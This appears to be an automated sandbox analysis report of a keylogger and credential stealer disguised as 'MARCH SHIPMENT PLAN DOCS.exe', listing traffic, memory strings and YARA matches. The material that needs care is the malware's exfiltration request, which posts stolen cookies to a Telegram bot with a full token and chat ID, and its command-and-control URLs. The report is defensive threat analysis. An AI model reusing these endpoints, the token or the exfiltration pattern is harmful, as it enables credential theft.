Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7699178513:AAEhuKQBbaAxJ54evVaAuMwZLV8FZ2cw8Rc/sendDocument?chat_id=6744331132&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5c610e80a695Host: api.telegram.orgContent-Length: 1282

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 05 Mar 2025 07:35:28 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 05 Mar 2025 07:35:29 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.00000000032A5000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002E75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1282291335.0000000003D38000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1282291335.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3702417475.0000000000432000.00000040.00000400.00020000.00000000.sdmp, PKjWaa.exe, 0000000C.00000002.1323725157.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1282291335.0000000003D38000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1282291335.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3702417475.0000000000432000.00000040.00000400.00020000.00000000.sdmp, PKjWaa.exe, 0000000C.00000002.1323725157.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002C81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1282291335.0000000003D38000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1282291335.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3702417475.0000000000432000.00000040.00000400.00020000.00000000.sdmp, PKjWaa.exe, 0000000C.00000002.1323725157.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002C81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.00000000032A5000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002E75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002C81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002C81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1282291335.0000000003D38000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1282291335.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3702417475.0000000000432000.00000040.00000400.00020000.00000000.sdmp, PKjWaa.exe, 0000000C.00000002.1323725157.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1280963333.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 0000000C.00000002.1321551762.0000000002E77000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002C81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1282291335.0000000003D38000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1282291335.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3702417475.0000000000432000.00000040.00000400.00020000.00000000.sdmp, PKjWaa.exe, 0000000C.00000002.1323725157.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002C81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3710821952.00000000040D3000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3710009312.0000000003CA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.0000000003198000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.00000000032A5000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002E75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: PKjWaa.exe, 00000014.00000002.3705314207.0000000002E75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.0000000003198000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002D69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.0000000003198000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002D69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20a
Source: PKjWaa.exe, 00000014.00000002.3705314207.0000000002E75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7699178513:AAEhuKQBbaAxJ54evVaAuMwZLV8FZ2cw8Rc/sendDocument?chat_id=6744
Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3710821952.00000000040D3000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3710009312.0000000003CA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3710821952.00000000040D3000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3710009312.0000000003CA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3710821952.00000000040D3000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3710009312.0000000003CA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: PKjWaa.exe, 00000014.00000002.3705314207.0000000002E19000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002E4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.0000000003249000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en4
Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.0000000003244000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002E14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003CA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003CA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003CA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.0000000003171000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.0000000003198000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.0000000003101000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002D41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1282291335.0000000003D38000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1282291335.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.0000000003101000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3702417475.0000000000432000.00000040.00000400.00020000.00000000.sdmp, PKjWaa.exe, 0000000C.00000002.1323725157.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: PKjWaa.exe, 00000014.00000002.3705314207.0000000002D41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.0000000003171000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.000000000312B000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.0000000003198000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002CFB000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002D41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3710821952.00000000040D3000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3710009312.0000000003CA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003CA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: PKjWaa.exe, 00000014.00000002.3705314207.0000000002E4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.000000000327A000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002E4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/4
Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.0000000003275000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002E45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49911
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49900

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49858 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49869 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 20.2.PKjWaa.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 20.2.PKjWaa.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.2.PKjWaa.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.PKjWaa.exe.3e9b608.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.PKjWaa.exe.3e9b608.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.PKjWaa.exe.3e9b608.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.PKjWaa.exe.3e9b608.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.PKjWaa.exe.3e9b608.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.PKjWaa.exe.3e9b608.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000014.00000002.3702397792.000000000042A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000C.00000002.1323725157.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1282291335.0000000003D38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1282291335.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: MARCH SHIPMENT PLAN DOCS.exe PID: 6276, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: PKjWaa.exe PID: 7368, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: PKjWaa.exe PID: 7948, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 0_2_071B86CA	0_2_071B86CA
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 0_2_071B86E8	0_2_071B86E8
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 0_2_071B9390	0_2_071B9390
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 0_2_071BB008	0_2_071BB008
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 0_2_071B8F58	0_2_071B8F58
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 0_2_071B8F48	0_2_071B8F48
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 0_2_071B8B11	0_2_071B8B11
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 0_2_071B8B20	0_2_071B8B20
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_02F2D278	10_2_02F2D278
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_02F25370	10_2_02F25370
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_02F2A088	10_2_02F2A088
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_02F2C147	10_2_02F2C147
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_02F27118	10_2_02F27118
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_02F2C738	10_2_02F2C738
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_02F2C468	10_2_02F2C468
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_02F2CA08	10_2_02F2CA08
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_02F269A0	10_2_02F269A0
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_02F2E988	10_2_02F2E988
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_02F2CFAB	10_2_02F2CFAB
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_02F2CCD8	10_2_02F2CCD8
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_02F23A99	10_2_02F23A99
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_02F229E0	10_2_02F229E0
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_02F2E97B	10_2_02F2E97B
